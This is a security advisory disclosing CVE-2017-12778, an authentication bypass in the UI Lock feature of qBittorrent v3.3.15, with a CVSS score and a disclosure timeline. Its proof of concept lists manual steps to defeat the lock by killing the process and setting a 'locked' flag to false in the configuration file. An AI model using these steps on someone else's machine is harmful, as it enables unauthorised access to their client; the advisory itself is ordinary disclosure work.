[CVE-2017–12778] qBittorrent UI Lock - Authentication Bypass

Product Description

The qBittorrent project aims to provide an open-source software alternative to µTorrent.

Overview

qBittorrent UI Lock functionality was vulnerable to authentication bypass. From the assessment of the product, it was noted that UI Lock screen functionality is supposed to protect unauthorised access to qBittorrent product features/functionality. The affected version of the product did not enforce robust authentication mechanism, thus UI Lock can be bypassed by tampering a flag in the client side configuration file.

Impact

From the assessment of the product, it was noted that UI Lock functionality is supposed to protect unauthorised access to qBittorrent product features/functionality. However, broken authentication mechanism may lead to unauthorised user accessing available functions of the product unauthorised manner.

Proof-of-Concept

1. Launch qbittorrent.exe

2. Click lock icon lock qBittorrent on upper right hand corner and input appropriate password

3. After successfully inputing the password, verify that the software asked for password when clicked through system tray icon or from exe file

4. To bypass this password prompt, bring up Window Task Manager and kill the qbittorrent.exe process

5. Go to Run and type %appdata%. The window explorer will be launched

6. Go inside qBittorrent folder within C:\Users\<username>\Roaming

7. Open qBittorrent configuration text file and locate locked attribute within Locking stanza

8. Change the value of locked attribute to false

9. Relaunch the qbittorrent.exe. Now, the UI Lock authentication is bypassed and the application will be launched without password prompt.

Affected Component

  • UI Lock Feature
  • qBittorrent config file
POC

Affected Product

qBittorrent v3.3.15

Risk Rating (CVSS 2)

Base Score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)

Credit

This vulnerability was discovered by Min Thu Han

Disclosure Timeline

  • 09–08–2017: Vulnerability discovered
  • 09–08–2017: Notified Vendor
  • 11–08-2017: No reply from the vendor
  • 11–08–2017: Vulnerability disclosed to be share on vendor open source forum
  • 11–08–2017: Vulnerability report posted in Vendor forum